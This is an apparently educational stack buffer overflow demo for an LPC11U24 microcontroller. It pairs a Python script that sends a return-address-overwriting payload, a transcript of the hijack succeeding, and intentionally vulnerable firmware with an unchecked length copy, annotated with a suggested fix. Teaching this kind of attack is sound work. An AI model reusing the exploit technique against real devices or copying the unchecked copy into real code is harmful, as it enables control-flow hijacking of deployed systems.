LPC11U24 stack buffer overflow demo
#!/usr/local/bin/python3
# -*- coding: utf-8 -*-
# please install pyserial
#
# Host side of the LPC11U24 stack buffer overflow demo. It waits for the
# firmware's "code:" prompt, then sends the 32-byte payload that bof_vlun()
# in the firmware copies into its 10-byte `bin` array without a length check.
import serial

# Serial device of the board; adjust to the local USB-serial adapter.
tty = "/dev/tty.usbserial-FTGD5T90"
# 115200 matches serial.baud(115200) in the firmware's main().
com = serial.Serial(tty, 115200)

# Read one byte at a time until the "code:" prompt shows up. Everything the
# firmware printed before it (memory map, enter/exit trace lines) is echoed.
s = ""
while s.find("code:") < 0:
    c = com.read(1)
    s = s + bytes.decode(c)
print(s)

print("bof attack start!")
# 32byte payload: byte 0 is the length field the firmware trusts as bin[0];
# bytes 1-3 are zero (so verification() still fails on data[1]); the
# remaining 7 words (range(7)) all hold the same little-endian address.
buf = [32, 0, 0, 0]
for i in range(int(32/4)-1):
    # 0x000003c5 : success_process
    # 0x000003c5 little endian
    buf.append(0xc5)
    buf.append(0x03)
    buf.append(0x00)
    buf.append(0x00)
# attack
com.write(bytearray(buf))

# Echo whatever the firmware prints afterwards. This loop never exits and the
# port is never closed; the script is stopped from the terminal (Ctrl-C).
print("received message:\n")
while True:
    print(bytes.decode(com.read(1)), end="")
$ ./bof_attacker.py | |
memory map: | |
main: 0x000004b1 | |
bof_vlun: 0x000003f5 | |
bof_vlun_pad: 0x00000489 | |
verification: 0x00000395 | |
success_process: 0x000003c5 | |
enter bof_vlun_pad | |
enter bof_vlun | |
code: | |
bof attack start! | |
received message: | |
enter bof_vlun | |
exit bof_vlun | |
verification error in bof_vuln | |
exit bof_vlun | |
enter success_process | |
verification success! | |
exit success_process | |
enter bof_vlun_pad | |
enter bof_vlun |
// LPC11U24 stack buffer overflow vulnerable demo | |
// using mbed library | |
// written by Toshifumi Nishinaga | |
// This code is public domain | |
#include "mbed.h" | |
// On-board LED handle; declared but never referenced anywhere in this file.
DigitalOut myled(LED1);
// UART used for every trace line and for reading the host's input
// (mbed's Serial takes tx then rx, so P0_19 = TX, P0_18 = RX — confirm
// against the board's pinout).
Serial serial(P0_19,P0_18);
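// Checks the received code: returns 1 when the second byte is 0xfe, 0
// otherwise. `data` must point at a buffer of at least two readable bytes
// (the caller passes its 10-byte `bin` array; byte 0 is the length field).
//
// Fix: the trace lines used to say "enter/exit bof_vlun", which made the
// serial transcript show bof_vlun entered twice per call; they now name
// this function so the trace can be read unambiguously.
int verification(unsigned char *data)
{
    int ret = 0;
    serial.printf("enter verification\n");
    // Only the second byte is inspected; the length byte at data[0] is ignored.
    if (data[1] == 0xfe)
        ret = 1;
    serial.printf("exit verification\n");
    return ret;
}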
// Target routine of the demo. It is reached legitimately when verification()
// returns 1, and in the overflow case through the overwritten return address
// of bof_vlun(); it only prints three trace lines and returns.
void success_process(void)
{
    serial.printf("enter success_process\n");
    serial.printf("verification success!\n");
    serial.printf("exit success_process\n");
}
// Intentionally vulnerable receiver. Reads a length byte and then that many
// further bytes from the UART into a fixed 10-byte stack array, with no
// check that the length fits. A length byte larger than 10 therefore writes
// past `bin` into the rest of the stack frame (including the saved return
// address, which is what the host script overwrites with the address of
// success_process). The minimal fix is a bound on the length field, e.g.
//     if (bin[0] > sizeof(bin)) { serial.printf("bad length\n"); return; }
// placed before the copy loop.
void bof_vlun(void)
{
    unsigned char bin[10];
    serial.printf("enter bof_vlun\n");
    serial.printf("code:");
    // wait data
    while(!serial.readable());
    // get data length
    // getc() returns an int; a negative (error) value would be truncated
    // into the unsigned char here rather than rejected — presumably never
    // happens on this board, but worth confirming.
    bin[0] = serial.getc();
    ////// vuln point : forget length check//////
    // bin[0] is attacker-controlled (up to 255), so i can run up to 254
    // while the array has only 10 elements.
    for(int i=1; i < bin[0]; i++) {
        // wait data
        while(!serial.readable());
        // input
        bin[i] = serial.getc();
    }
    ////// vuln point //////
    // verification() only looks at bin[1]; with the demo payload (bin[1]==0)
    // this branch takes the error path and the hijack happens on return.
    if(verification(bin)) {
        success_process();
    } else {
        serial.printf("verification error in bof_vuln\n");
    }
    serial.printf("exit bof_vlun\n");
}
// Thin wrapper around bof_vlun() that prints enter/exit trace lines. Its
// only purpose in the demo is to add one more stack frame above bof_vlun().
// Note that once bof_vlun()'s return address has been overwritten the
// "exit bof_vlun_pad" line is never printed (see the transcript).
void bof_vlun_pad(void)
{
    serial.printf("enter bof_vlun_pad\n");
    bof_vlun();
    serial.printf("exit bof_vlun_pad\n");
}
// Entry point: configures the UART, prints the addresses of the program's
// functions, then services bof_vlun_pad() forever.
//
// Printing the function addresses over the serial port is what hands the
// host the value it needs for the overwritten return address; a real
// firmware would never disclose its memory map like this. Taking the
// address of main is not permitted by ISO C++ (compilers accept it with a
// warning), and passing a pointer to "%08x" relies on pointers and unsigned
// int having the same width, which holds on this 32-bit target.
int main(void)
{
    serial.baud(115200);
    serial.printf("memory map:\n");
    serial.printf("main: 0x%08x\n", &main);
    serial.printf("bof_vlun: 0x%08x\n", &bof_vlun);
    serial.printf("bof_vlun_pad: 0x%08x\n", &bof_vlun_pad);
    serial.printf("verification: 0x%08x\n", &verification);
    serial.printf("success_process: 0x%08x\n", &success_process);
    // Never exits; the return below is unreachable.
    while(1) {
        bof_vlun_pad();
    }
    return 0;
}